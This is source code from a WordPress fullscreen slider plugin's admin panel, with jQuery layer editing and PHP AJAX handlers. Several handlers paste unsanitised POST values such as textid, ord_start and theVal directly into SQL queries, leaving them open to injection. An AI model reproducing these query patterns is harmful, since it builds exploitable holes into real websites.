			css_aux="lbg_fullscreen_fullwidth_slider_textWhiteBgBlack_medium";
			img_src_hidden="hidden";
			changeImgBtn_css="none";
		} else {
			content_aux='IMAGE '+(jQuery('#lbg_fullscreen_fullwidth_slider_layers_sortable').children().size()+1);
			content_title='Image Title';
			image_path='Image Path';
			draggable_aux='<img src="'+img_src+'">';
			css_aux="lbg_fullscreen_fullwidth_slider_textWhiteBgTransparent_small";
			img_src_hidden="text";
			changeImgBtn_css="block";
		}

		jQuery("#no_layers").css('display','none');
		jQuery("#photo_div"+photoid).append('<div id="draggable'+textID+'" rel="'+textID+'" class="my_draggable '+css_aux+'" style="left:0px;top:0px;z-index:'+newZindex+';" onclick="activate_layer('+textID+');">'+draggable_aux+'</div>');

		jQuery("#lbg_fullscreen_fullwidth_slider_layers_sortable").prepend('<li class="ui-state-default cursor_move" id="'+textID+'" data-photoid="'+photoid+'" onclick="activate_layer('+textID+');"><div id="li_div'+textID+'">'+content_aux+'</div> <input name="ord_input_'+textID+'" type="text" disabled="disabled" id="ord_input_'+textID+'" style="float:right; margin-top:-20px;" value="'+maxORD+'" size="3" readonly="readonly" /></li>');
		activate_layers_order_li(textID);

		//activate delete layer button
		jQuery('input[name=currentTextID]').val(textID);
		jQuery('#deletelayer').removeAttr("disabled");
		jQuery('#duplicatelayer').removeAttr("disabled");

		jQuery("#draggable"+textID).draggable( {
			drag: function(event, ui) {
				jQuery("#data-final-left"+textID).val(lbg_fullscreen_fullwidth_slider_process_val(jQuery(this).css('left'),'left'));
				jQuery("#data-final-top"+textID).val(lbg_fullscreen_fullwidth_slider_process_val(jQuery(this).css('top'),'top'));
			}
		});

		jQuery("[id^='lbg_fullscreen_fullwidth_sliderTable']").css({
			'display':'none'
		});


		jQuery('[id^="draggable"]').removeClass("my_draggable_activated");
		jQuery("#draggable"+textID).addClass("my_draggable_activated");


		var div_data='<div id="lbg_fullscreen_fullwidth_sliderTable'+textID+'">';
		div_data+='<table width="100%" cellspacing="0" class="widefat">';
		div_data+='<tr>';
		div_data+='<td width="15%" align="left" valign="middle" class="row-title">'+content_title+'</td>';
		div_data+='<td colspan="3" align="left" valign="middle"><textarea name="content'+textID+'" cols="80" rows="5" id="content'+textID+'" onkeyup="change_text_div_content('+textID+',this);">'+content_aux+'</textarea></td>';
		div_data+='</tr>';
		div_data+='<tr>';
		div_data+='<td align="left" valign="middle" class="row-title">'+image_path+'</td>';
		div_data+='<td colspan="3" align="left" valign="middle"><input name="img_src'+textID+'" id="img_src'+textID+'" value="'+img_src+'" size="60" type="'+img_src_hidden+'" /> <input name="changeImage'+textID+'" id="changeImage'+textID+'" type="button" class="button-primary" value="Change Image" style="float:right; display:'+changeImgBtn_css+';" onClick="change_layer_image()"></td>';
		div_data+='</tr>';
		div_data+='<tr>';
		div_data+='<td align="left" valign="middle" class="row-title">CSS Style</td>';
		div_data+='<td colspan="3" align="left" valign="middle"><div id="lbg_fullscreen_fullwidth_sliderCSS_div'+textID+'">';
		<?php lbg_fullscreen_fullwidth_slider_getCssStyles('lbg_fullscreen_fullwidth_slider_textWhiteBgBlack_medium','unique_xyz','div_data+=\'');?>
		div_data+='</div> <input name="EditCssClasses'+textID+'" id="EditCssClasses'+textID+'" type="button" class="button-primary" value="Edit CSS Clases" style="float:right; margin-top:-25px;" onclick="lbg_fullscreen_fullwidth_slider_edit_css_classes(\'open\',\'\',\'\')"></td>';
		div_data+='</tr>';
		div_data+='<tr>';
		div_data+='<td align="left" valign="middle">&nbsp;</td>';
		div_data+='<td width="35%" align="left" valign="middle">&nbsp;</td>';
		div_data+='<td width="15%" align="left" valign="middle">&nbsp;</td>';
		div_data+='<td width="35%" align="left" valign="middle">&nbsp;</td>';
		div_data+='</tr>';
		div_data+='<tr>';
		div_data+='<td colspan="4" align="left" valign="middle" class="lbg_regGrayWithBg">Enter Values</td>';
		div_data+='</tr>';
		div_data+='<tr>';
		div_data+='<td align="left" valign="middle" class="row-title">Initial Left</td>';
		div_data+='<td align="left" valign="middle"><input name="data-initial-left'+textID+'" type="text" id="data-initial-left'+textID+'" size="10" value="0" /> px</td>';
		div_data+='<td align="left" valign="middle" class="row-title">Inital Top</td>';
		div_data+='<td align="left" valign="middle"><input name="data-initial-top'+textID+'" type="text" id="data-initial-top'+textID+'" size="10" value="0" /> px</td>';
		div_data+='</tr>';
		div_data+='<tr>';
		div_data+='<td align="left" valign="middle" class="row-title">Final Left</td>';
		div_data+='<td align="left" valign="middle"><input name="data-final-left'+textID+'" type="text" id="data-final-left'+textID+'" size="10" value="0" /> px</td>';
		div_data+='<td align="left" valign="middle" class="row-title">Final Top</td>';
		div_data+='<td align="left" valign="middle"><input name="data-final-top'+textID+'" type="text" id="data-final-top'+textID+'" size="10" value="0" /> px</td>';
		div_data+='</tr>';
		div_data+='<tr>';
		div_data+='<td align="left" valign="middle" class="row-title">Duration</td>';
		div_data+='<td align="left" valign="middle"><input name="data-duration'+textID+'" type="text" id="data-duration'+textID+'" size="10" value="0" /> seconds</td>';
		div_data+='<td align="left" valign="middle" class="row-title">Delay</td>';
		div_data+='<td align="left" valign="middle"><input name="data-delay'+textID+'" type="text" id="data-delay'+textID+'" size="10" value="0" /> seconds</td>';
		div_data+='</tr>';
		div_data+='<tr>';
		div_data+='<td align="left" valign="middle" class="row-title">Initial Fade</td>';
		div_data+='<td align="left" valign="middle"><input name="data-fade-start'+textID+'" type="text" id="data-fade-start'+textID+'" size="10" value="0" /> (0-100)</td>';
		div_data+='</table>';
		div_data+='</div>';

		jQuery("#all_texts_settings").append(div_data.replace(/unique_xyz/g,textID));

		jQuery("#css"+textID).val(css_aux);


		var lis = jQuery('#lbg_fullscreen_fullwidth_slider_layers_sortable').children();

		var i=0;
		lis.each(function() {
			i++;
		   currentLi = jQuery(this);
		   //new order
		   jQuery('input[name=ord_input_'+currentLi.attr('id')+']').val(i);

		   //new z-index
			jQuery('#draggable'+currentLi.attr('id')).css({
				'zIndex':100-i
			});
		});
}


function lbg_fullscreen_fullwidth_slider_add_text_line(photoid,img_src) {
	var data ="action=lbg_fullscreen_fullwidth_slider_add_text_record&security=<?php echo esc_js($lbg_fullscreen_fullwidth_slider_add_text_record_ajax_nonce); ?>&photoid="+photoid+"&img_src="+img_src;

	// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
	jQuery.post(ajaxurl, data, function(response) {
		//alert('Got this from the server: ' + response);

		response_arr=response.split("####");
		textID=response_arr[0];
		maxORD=response_arr[1];

		lbg_fullscreen_fullwidth_slider_add_text_line_CONTENT(textID,maxORD,photoid,img_src);

	});


}


function lbg_fullscreen_fullwidth_slider_delete_text_line(textid) {
	var data ="action=lbg_fullscreen_fullwidth_slider_delete_text_record&security=<?php echo esc_js($lbg_fullscreen_fullwidth_slider_delete_text_record_ajax_nonce); ?>&textid="+textid;

	// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
	jQuery.post(ajaxurl, data, function(response) {
			var deleted_ord=response;

			jQuery('#'+textid).remove();
			var lis = jQuery('#lbg_fullscreen_fullwidth_slider_layers_sortable').children();
			lis.each(function() {
			   currentLi = jQuery(this);
			   old_ord=jQuery('input[name=ord_input_'+currentLi.attr('id')+']').val();
			   if (parseInt(old_ord,10)>parseInt(deleted_ord,10)) {
			   		jQuery('input[name=ord_input_'+currentLi.attr('id')+']').val(old_ord-1);
			   }
			});


			jQuery('#draggable'+textid).remove();

			jQuery('[id^="lbg_fullscreen_fullwidth_sliderTable"]').css({
					'display':'none'
			});

			//disable delete button
			jQuery('#deletelayer').attr("disabled", "disabled");
			jQuery('#duplicatelayer').attr("disabled", "disabled");

	});
}



function change_text_div_css_class(theID,sel) {
	jQuery("#draggable"+theID).removeClass(jQuery("#draggable"+theID).attr('class'));

	jQuery("#draggable"+theID).addClass('my_draggable');
	jQuery("#draggable"+theID).addClass(sel.options[sel.selectedIndex].value);
	jQuery("#draggable"+theID).addClass("my_draggable_activated");
}

function change_text_div_content(theID,textareaID) {
	var theTEXT=jQuery(textareaID).val();
	theTEXT=theTEXT.replace(/<\/?[^>]+>/gi, '');
	if (jQuery('input[name=img_src'+theID+']').val()=='')
		jQuery('#draggable'+theID).html(theTEXT);
	if (theTEXT.length>50) {
		theTEXT=theTEXT.substring(0,50);
		theTEXT+='...';
	}
	jQuery('#li_div'+theID).html(theTEXT);
}

function change_layer_image() {
	 formfield = 'img_src';
	 tb_show('', 'media-upload.php?type=image&amp;TB_iframe=true');
	 return false;
}

function lbg_fullscreen_fullwidth_slider_process_val(val,cssprop) {
	retVal=parseInt(val.substring(0, val.length-2));
	if (cssprop=="top")
		retVal=retVal-0;
	return retVal;
}

function deactivate_all_layers() {
	jQuery('[id^="draggable"]').removeClass('my_draggable_activated');

	//order div
	activate_layers_order_li(0);

	//disable settings table
	jQuery("[id^='lbg_fullscreen_fullwidth_sliderTable']").css({
		'display':'none'
	});

	//disable delete button
	jQuery('#deletelayer').attr("disabled", "disabled");
	jQuery('#duplicatelayer').attr("disabled", "disabled");
}

function activate_layer(theID) {
		//activate delete layer button
		jQuery('input[name=currentTextID]').val(theID);
		jQuery('#deletelayer').removeAttr("disabled");
		jQuery('#duplicatelayer').removeAttr("disabled");

		jQuery('[id^="lbg_fullscreen_fullwidth_sliderTable"]').css({
			'display':'none'
		});

		jQuery('#lbg_fullscreen_fullwidth_sliderTable'+theID).css({
			'display':'block'
		});

		jQuery('[id^="draggable"]').removeClass("my_draggable_activated");
		jQuery("#draggable"+theID).addClass("my_draggable_activated");

		//order div
		activate_layers_order_li(theID);
}


function activate_layers_order_li(theID) {
	var list = jQuery("#lbg_fullscreen_fullwidth_slider_layers_sortable").children();
	list.each(function() {
		if (jQuery(this).attr('id')==theID)
			jQuery(this).css({'border':'1px solid #000000'});
		else
			jQuery(this).css({'border':'1px solid #dfdfdf'});
	});
}



function lbg_fullscreen_fullwidth_slider_duplicate(action_type,recordID) {
	var data ="action=lbg_fullscreen_fullwidth_slider_duplicate_record&security=<?php echo esc_js($lbg_fullscreen_fullwidth_slider_duplicate_record_ajax_nonce); ?>&action_type="+action_type+"&recordID="+recordID;

	// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
	jQuery.post(ajaxurl, data, function(response) {
		jQuery('#form-elements-lbg_fullscreen_fullwidth_slider').submit();
	});
}



function lbg_fullscreen_fullwidth_slider_edit_css_classes(action_type,theVal,playlistID) {
	if (action_type=='open') {
		jQuery( "#dialogEditCSSClasses" ).dialog( "open" );
	} else {
		var data ="action=lbg_fullscreen_fullwidth_slider_edit_css_classes_record&security=<?php echo esc_js($lbg_fullscreen_fullwidth_slider_edit_css_classes_record_ajax_nonce); ?>&action_type="+action_type+"&theVal="+theVal+"&playlistID="+playlistID;

		// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
		jQuery.post(ajaxurl, data, function(response) {
			response_arr=response.split("#*#*");
			for(i=0;i<response_arr.length ;i++) {
				if (i==0) {
					new_css_select=response_arr[0];
				} else {
					if (i==response_arr.length-1) {
						jQuery('#css_styles_div').html(response_arr[response_arr.length-1]);
						jQuery('textarea#css_classes').val(response_arr[response_arr.length-1]);
					} else {
						orig_css=jQuery("#css"+response_arr[i]).val();
						jQuery('#lbg_fullscreen_fullwidth_sliderCSS_div'+response_arr[i]).html(new_css_select.replace(/unique_xyz/g,response_arr[i]));
						jQuery("#css"+response_arr[i]).val(orig_css);
					}
				}
			}


			jQuery('#editCSSClasses_message').css('display','block');
			jQuery('#editCSSClasses_message').html('CSS classes updated!');

			setTimeout(function(){
					 jQuery('#editCSSClasses_message').css('display','none');
       				 jQuery('#dialogEditCSSClasses').dialog('close');
    			}, 1000);

		});
	}
}

function showDialogPreview(theSliderID) {  //load content and open dialog
	var data ="action=lbg_fullscreen_fullwidth_slider_preview_record&security=<?php echo esc_js($lbg_fullscreen_fullwidth_slider_preview_record_ajax_nonce); ?>&theSliderID="+theSliderID;

	// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
	jQuery.post(ajaxurl, data, function(response) {
		//jQuery("#previewDialog").html(response);
		jQuery('#previewDialogIframe').attr('src','<?php echo plugins_url("tpl/preview.html?d=".time(), __FILE__)?>');
		jQuery("#previewDialog").dialog("open");
	});
}



jQuery(document).ready(function($) {
	/*PREVIEW DIALOG BOX*/
	jQuery( "#previewDialog" ).dialog({
	  minWidth:1200,
	  minHeight:500,
	  title:"Slider Preview",
	  modal: true,
	  autoOpen:false,
	  hide: "fade",
	  resizable: false,
	  open: function() {
	  },
	  close: function() {
		jQuery('#previewDialogIframe').attr('src','');
	  }
	});

	/* THE PLAYLIST */
	if (jQuery('#lbg_fullscreen_fullwidth_slider_sortable').length) {
		jQuery( '#lbg_fullscreen_fullwidth_slider_sortable' ).sortable({
			placeholder: "ui-state-highlight",
			start: function(event, ui) {
	            ord_start = ui.item.prevAll().length + 1;
	        },
			update: function(event, ui) {
	        	jQuery("#lbg_fullscreen_fullwidth_slider_sortable").sortable('disable');
	        	jQuery("#lbg_fullscreen_fullwidth_slider_updating_witness").css("display","block");
				var ord_stop=ui.item.prevAll().length + 1;
				var elem_id=ui.item.attr("id");
				var data = "action=lbg_fullscreen_fullwidth_slider_update_playlist_record&security=<?php echo esc_js($lbg_fullscreen_fullwidth_slider_update_playlist_record_ajax_nonce); ?>&updateType=change_ord&ord_start="+ord_start+"&ord_stop="+ord_stop+"&elem_id="+elem_id;
				// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
				jQuery.post(ajaxurl, data, function(response) {
					jQuery("#lbg_fullscreen_fullwidth_slider_sortable").sortable('enable');
					jQuery("#lbg_fullscreen_fullwidth_slider_updating_witness").css("display","none");
				});
			}
		});
	}

/* THE LAYERS */
	if (jQuery('#lbg_fullscreen_fullwidth_slider_layers_sortable').length) {
		jQuery( '#lbg_fullscreen_fullwidth_slider_layers_sortable' ).sortable({
			placeholder: "ui-state-highlight",
			start: function(event, ui) {
	            ord_start = ui.item.prevAll().length + 1;
	        },
			update: function(event, ui) {
	        	jQuery("#lbg_fullscreen_fullwidth_slider_layers_sortable").sortable('disable');
	        	jQuery("#lbg_fullscreen_fullwidth_slider_updating_witness").css("display","block");
				var ord_stop=ui.item.prevAll().length + 1;
				var elem_id=ui.item.attr("id");
				var photoid=ui.item.attr("data-photoid");

				var lis = jQuery('#lbg_fullscreen_fullwidth_slider_layers_sortable').children();
				var i=0;
				lis.each(function() {
					i++;
				   currentLi = jQuery(this);
				   //new order
				   jQuery('input[name=ord_input_'+currentLi.attr('id')+']').val(i);

				   //new z-index
				    jQuery('#draggable'+currentLi.attr('id')).css({
						'zIndex':100-i
					});
				});


				var data = "action=lbg_fullscreen_fullwidth_slider_update_playlist_record&security=<?php echo esc_js($lbg_fullscreen_fullwidth_slider_update_playlist_record_ajax_nonce); ?>&updateType=change_layers_ord&ord_start="+ord_start+"&ord_stop="+ord_stop+"&photoid="+photoid+"&elem_id="+elem_id;
				// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
				jQuery.post(ajaxurl, data, function(response) {
					jQuery("#lbg_fullscreen_fullwidth_slider_layers_sortable").sortable('enable');
					jQuery("#lbg_fullscreen_fullwidth_slider_updating_witness").css("display","none");
				});
			}
		});
	}


	<?php
		$rows_count = $wpdb->get_var( "SELECT COUNT(*) FROM ". $wpdb->prefix . "lbg_fullscreen_fullwidth_slider_playlist;" );
		for ($i=1;$i<=$rows_count;$i++) {
	?>

				jQuery('#upload_img_button_lbg_fullscreen_fullwidth_slider_<?php echo esc_js($i)?>').click(function(event) {
						var file_frame;
						event.preventDefault();
						// If the media frame already exists, reopen it.
						if ( file_frame ) {
							file_frame.open();
							return;
						}
						// Create the media frame.
						file_frame = wp.media.frames.file_frame = wp.media({
							title: jQuery( this ).data( 'uploader_title' ),
							button: {
							text: jQuery( this ).data( 'uploader_button_text' ),
							},
							multiple: false // Set to true to allow multiple files to be selected
						});
						// When an image is selected, run a callback.
						file_frame.on( 'select', function() {
							// We set multiple to false so only get one image from the uploader
							attachment = file_frame.state().get('selection').first().toJSON();
							// Do something with attachment.id and/or attachment.url here
							document.forms["form-playlist-lbg_fullscreen_fullwidth_slider-"+<?php echo esc_js($i)?>].img.value=attachment.url;
							jQuery('#img_'+<?php echo esc_js($i)?>).attr('src',attachment.url);
						});
						// Finally, open the modal
						file_frame.open();
				});


				jQuery('#upload_thumbnail_button_lbg_fullscreen_fullwidth_slider_<?php echo esc_js($i)?>').click(function(event) {
						var file_frame;
						event.preventDefault();
						// If the media frame already exists, reopen it.
						if ( file_frame ) {
							file_frame.open();
							return;
						}
						// Create the media frame.
						file_frame = wp.media.frames.file_frame = wp.media({
							title: jQuery( this ).data( 'uploader_title' ),
							button: {
							text: jQuery( this ).data( 'uploader_button_text' ),
							},
							multiple: false // Set to true to allow multiple files to be selected
						});
						// When an image is selected, run a callback.
						file_frame.on( 'select', function() {
							// We set multiple to false so only get one image from the uploader
							attachment = file_frame.state().get('selection').first().toJSON();
							// Do something with attachment.id and/or attachment.url here
							document.forms["form-playlist-lbg_fullscreen_fullwidth_slider-"+<?php echo esc_js($i)?>].thumbnail.value=attachment.url;
							jQuery('#thumbnail_'+<?php echo esc_js($i)?>).attr('src',attachment.url);
						});
						// Finally, open the modal
						file_frame.open();
				});




	jQuery("#form-playlist-lbg_fullscreen_fullwidth_slider-<?php echo esc_js($i)?>").submit(function(event) {

		/* stop form from submitting normally */
		event.preventDefault();

		//show loading image
		jQuery('#ajax-message-<?php echo esc_js($i)?>').html('<img src="<?php echo plugins_url('lbg_fullscreen_fullwidth_slider/images/ajax-loader.gif', dirname(__FILE__))?>" />');
		var data ="action=lbg_fullscreen_fullwidth_slider_update_playlist_record&security=<?php echo esc_js($lbg_fullscreen_fullwidth_slider_update_playlist_record_ajax_nonce); ?>&"+jQuery("#form-playlist-lbg_fullscreen_fullwidth_slider-<?php echo esc_js($i)?>").serialize();

		// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
		jQuery.post(ajaxurl, data, function(response) {
			var new_img = '';
			if (document.forms["form-playlist-lbg_fullscreen_fullwidth_slider-<?php echo esc_js($i)?>"].img.value!='')
				new_img=document.forms["form-playlist-lbg_fullscreen_fullwidth_slider-<?php echo esc_js($i)?>"].img.value;
			jQuery('#top_image_'+document.forms["form-playlist-lbg_fullscreen_fullwidth_slider-<?php echo esc_js($i)?>"].id.value).attr('src',new_img);
			jQuery('#ajax-message-<?php echo esc_js($i)?>').html(response);
		});
	});
	<?php } ?>

});
</script>
<?php
	$safe_sql="SELECT * FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_css_definitions) LIMIT 0, 1";
	$row = $wpdb->get_row($safe_sql,ARRAY_A);
	echo '<style id="css_styles_div">'.$row['css_styles'].'</style>';
		}
	}
}


add_action('wp_ajax_lbg_fullscreen_fullwidth_slider_update_playlist_record', 'lbg_fullscreen_fullwidth_slider_update_playlist_record_callback');

function lbg_fullscreen_fullwidth_slider_update_playlist_record_callback() {

	check_ajax_referer( 'lbg_fullscreen_fullwidth_slider_update_playlist_record-special-string', 'security' ); //security=<?php echo $lbg_fullscreen_fullwidth_slider_update_playlist_record_ajax_nonce;
	global $wpdb;
	global $lbg_fullscreen_fullwidth_slider_messages;
	$errors_arr=array();

	//delete entire record
	if (array_key_exists('updateType', $_POST) && $_POST['updateType']=='lbg_fullscreen_fullwidth_slider_delete_entire_record') {
		$delete_id=$_POST['delete_id'];
		$safe_sql=$wpdb->prepare("SELECT * FROM ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_playlist WHERE id = %d",$delete_id);
		$row = $wpdb->get_row($safe_sql, ARRAY_A);
		$row=lbg_fullscreen_fullwidth_slider_unstrip_array($row);

		//delete the entire record
		$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_playlist WHERE id = %d",$delete_id));
		//delete texts
		$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_texts WHERE photoid = %d",$delete_id));
		//update the order for the rest ord=ord-1 for > ord
		$wpdb->query($wpdb->prepare("UPDATE ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_playlist SET ord=ord-1 WHERE bannerid = %d and  ord>".$row['ord'],$_SESSION['xid']));
	}

	//update elements order
	if (array_key_exists('updateType', $_POST) && $_POST['updateType']=='change_ord') {
		$sql_arr=array();
		$ord_start=$_POST['ord_start'];
		$ord_stop=$_POST['ord_stop'];
		$elem_id=(int)$_POST['elem_id'];
		$ord_direction='+1';
		if ($ord_start<$ord_stop)
			$sql_arr[]=$wpdb->prepare( "UPDATE ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_playlist SET ord=ord-1  WHERE bannerid = %d and ord>".$ord_start." and ord<=".$ord_stop, $_SESSION['xid']);
		else
			$sql_arr[]=$wpdb->prepare( "UPDATE ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_playlist SET ord=ord+1  WHERE bannerid = %d and ord>=".$ord_stop." and ord<".$ord_start, $_SESSION['xid']);
		$sql_arr[]=$wpdb->prepare( "UPDATE ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_playlist SET ord=%d WHERE id=%d",$ord_stop, $elem_id) ;

		foreach ($sql_arr as $sql)
			$wpdb->query($sql);
	}


	//update layers order
	if (array_key_exists('updateType', $_POST) && $_POST['updateType']=='change_layers_ord') {
		$sql_arr=array();
		$ord_start=$_POST['ord_start'];
		$ord_stop=$_POST['ord_stop'];
		$elem_id=(int)$_POST['elem_id'];
		$photoid=(int)$_POST['photoid'];
		$ord_direction='+1';
		if ($ord_start<$ord_stop)
			$sql_arr[]=$wpdb->prepare( "UPDATE ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_texts SET ord=ord-1  WHERE photoid = %d and ord>".$ord_start." and ord<=".$ord_stop, $photoid);
		else
			$sql_arr[]=$wpdb->prepare( "UPDATE ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_texts SET ord=ord+1  WHERE photoid = %d and ord>=".$ord_stop." and ord<".$ord_start, $photoid);
		$sql_arr[]=$wpdb->prepare( "UPDATE ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_texts SET ord=%d WHERE id=%d", $ord_stop, $elem_id);

		foreach ($sql_arr as $sql)
			$wpdb->query($sql);
	}



	//submit update
	$theid=isset($_POST['id'])?$_POST['id']:0;
	if($theid>0 && !count($errors_arr)) {
		//update playlist
		$wpdb->update(
			$wpdb->prefix .'lbg_fullscreen_fullwidth_slider_playlist',
				array(
				'img' => sanitize_text_field($_POST['img']),
				'thumbnail' => sanitize_text_field($_POST['thumbnail']),
				'alt_text' => sanitize_text_field($_POST['alt_text']),
				'data-video' => sanitize_text_field($_POST['data-video']),
				'data-link' => sanitize_text_field($_POST['data-link']),
				'data-target' => sanitize_text_field($_POST['data-target']),
				'content' => $_POST['content']
				),
			array( 'id' => $theid )
		);

		?>
			<div id="message" class="updated"><p><?php echo stripslashes($lbg_fullscreen_fullwidth_slider_messages['data_saved']);?></p></div>
	<?php
	} else if (!isset($_POST['updateType'])) {
		$errors_arr[]=$lbg_fullscreen_fullwidth_slider_messages['invalid_request'];
	}

	if (count($errors_arr)) { ?>
		<div id="error" class="error"><p><?php echo implode("<br>", $errors_arr);?></p></div>
	<?php }

	wp_die(); // this is required to return a proper result
}




add_action('wp_ajax_lbg_fullscreen_fullwidth_slider_add_text_record', 'lbg_fullscreen_fullwidth_slider_add_text_record_callback');

function lbg_fullscreen_fullwidth_slider_add_text_record_callback() {

	check_ajax_referer( 'lbg_fullscreen_fullwidth_slider_add_text_record-special-string', 'security' );
	global $wpdb;

	$wpdb->query($wpdb->prepare("UPDATE ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_texts SET ord=ord+1 WHERE photoid = %d",$_POST['photoid']));

	if ($_POST['img_src']=='') {
			$css_aux="lbg_fullscreen_fullwidth_slider_textWhiteBgBlack_medium";
	} else {
			$css_aux="lbg_fullscreen_fullwidth_slider_textWhiteBgTransparent_small";
	}

	$new_max_ord = 1+$wpdb->get_var( $wpdb->prepare( "SELECT max(ord) FROM ". $wpdb->prefix ."lbg_fullscreen_fullwidth_slider_texts WHERE photoid = %d",$_POST['photoid'] ) );
	$max_ord=1;
	if ($_POST['img_src']=='') {
		$content_aux='TEXT HERE '.$new_max_ord;
	} else {
		$content_aux='IMAGE '.$new_max_ord;
	}
$wpdb->insert(
			$wpdb->prefix . "lbg_fullscreen_fullwidth_slider_texts",
			array(
				'photoid' => sanitize_text_field($_POST['photoid']),
				'img_src' => sanitize_text_field($_POST['img_src']),
				'content' => $content_aux,
				'data-initial-left' => 0,
				'data-initial-top' => 0,
				'data-final-left' => 0,
				'data-final-top' => 0,
				'data-duration' => 0,
				'data-fade-start' => 0,
				'data-delay' => 0,
				'css' => $css_aux,
				'ord' => 1

			),
			array(
'%d',
'%s',
'%s',
'%s',
'%s',
'%d',
'%d',
'%d',
'%d',
'%f',
'%d',
'%f',
'%s',
'%d'
			)
		);

		echo $wpdb->insert_id.'####'.$max_ord;

		wp_die(); // this is required to return a proper result
}




add_action('wp_ajax_lbg_fullscreen_fullwidth_slider_delete_text_record', 'lbg_fullscreen_fullwidth_slider_delete_text_record_callback');

function lbg_fullscreen_fullwidth_slider_delete_text_record_callback() {

	check_ajax_referer( 'lbg_fullscreen_fullwidth_slider_delete_text_record-special-string', 'security' );
	global $wpdb;

	$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_texts) WHERE id = %d",$_POST['textid'] );
	$row = $wpdb->get_row($safe_sql,ARRAY_A);

	$wpdb->query(
	"
	DELETE FROM ".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_texts
	WHERE id = ".$_POST['textid']."
	"
	);

	$wpdb->query(
	"UPDATE ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_texts SET ord=ord-1  WHERE photoid = ".$row['photoid']." and ord>".$row['ord']
	);


	echo $row['ord'];

	wp_die(); // this is required to return a proper result
}


add_action('wp_ajax_lbg_fullscreen_fullwidth_slider_duplicate_record', 'lbg_fullscreen_fullwidth_slider_duplicate_record_callback');

function lbg_fullscreen_fullwidth_slider_duplicate_record_callback() {

	check_ajax_referer( 'lbg_fullscreen_fullwidth_slider_duplicate_record-special-string', 'security' );
	global $wpdb;

	$return_str='';

	if ($_POST['action_type']='duplicate layer') {
		$_SESSION['duplicate_layer'] = $_POST['recordID'];
	}

	echo $return_str;

	wp_die(); // this is required to return a proper result
}



add_action('wp_ajax_lbg_fullscreen_fullwidth_slider_edit_css_classes_record', 'lbg_fullscreen_fullwidth_slider_edit_css_classes_record_callback');

function lbg_fullscreen_fullwidth_slider_edit_css_classes_record_callback() {

	check_ajax_referer( 'lbg_fullscreen_fullwidth_slider_edit_css_classes_record-special-string', 'security' );
	global $wpdb;

	if ($_POST['action_type']=='update_css') {
		$wpdb->query(
		"UPDATE ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_css_definitions SET css_styles='".$_POST['theVal']."'  WHERE id = 1"
		);
	} else {
		$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_css_definitions) WHERE id = %d", 1);
		$row_css = $wpdb->get_row($safe_sql,ARRAY_A);
		$wpdb->query(
		"UPDATE ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_css_definitions SET css_styles='".$row_css['css_styles_orig']."' WHERE id = 1"
		);
	}

	$safe_sql="SELECT * FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_css_definitions) LIMIT 0, 1";
	$row2 = $wpdb->get_row($safe_sql,ARRAY_A);

	if ($_POST['action_type']!='open') {
		$filename=plugin_dir_path(__FILE__) . 'fulscreen_background/text_classes.css';
		$fp = fopen($filename, 'w+');
		$fwrite = fwrite($fp, $row2['css_styles']);
	}


	$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_texts) WHERE photoid = %d ORDER BY ord",$_POST['playlistID'] );
	$result_text2 = $wpdb->get_results($safe_sql,ARRAY_A);

	$return_arr=array();
	$return_str='';
	foreach ( $result_text2 as $row_text2 ) {
		$return_arr[]=$row_text2['id'];
	}
	$return_str=lbg_fullscreen_fullwidth_slider_getCssStyles('lbg_fullscreen_fullwidth_slider_textWhiteBgBlack_medium','unique_xyz','')."#*#*".implode("#*#*", $return_arr)."#*#*".$row2['css_styles'];
	echo $return_str;

	wp_die(); // this is required to return a proper result
}




add_action('wp_ajax_lbg_fullscreen_fullwidth_slider_preview_record', 'lbg_fullscreen_fullwidth_slider_preview_record_callback');

function lbg_fullscreen_fullwidth_slider_preview_record_callback() {
	check_ajax_referer( 'lbg_fullscreen_fullwidth_slider_preview_record-special-string', 'security' );

	$aux_val='<html>
					<head>
						<link href="'.plugins_url('fulscreen_background/fullscreen_background.css', __FILE__).'" rel="stylesheet" type="text/css">
						<link href="'.plugins_url('fulscreen_background/text_classes.css', __FILE__).'?'.time().'" rel="stylesheet" type="text/css">

						<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js" type="text/javascript"></script>
						<script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.10.4/jquery-ui.min.js"></script>
						<script src="'.plugins_url('fulscreen_background/js/jquery.touchSwipe.min.js', __FILE__).'" type="text/javascript"></script>
						<script src="'.plugins_url('fulscreen_background/js/fullscreen_background.js', __FILE__).'" type="text/javascript"></script>
					</head>
					<body style="padding:0px;margin:0px; width:100%; height:100%;">';

	$aux_val.=lbg_fullscreen_fullwidth_slider_generate_preview_code($_POST['theSliderID']);
	$aux_val.="</body>
				</html>";
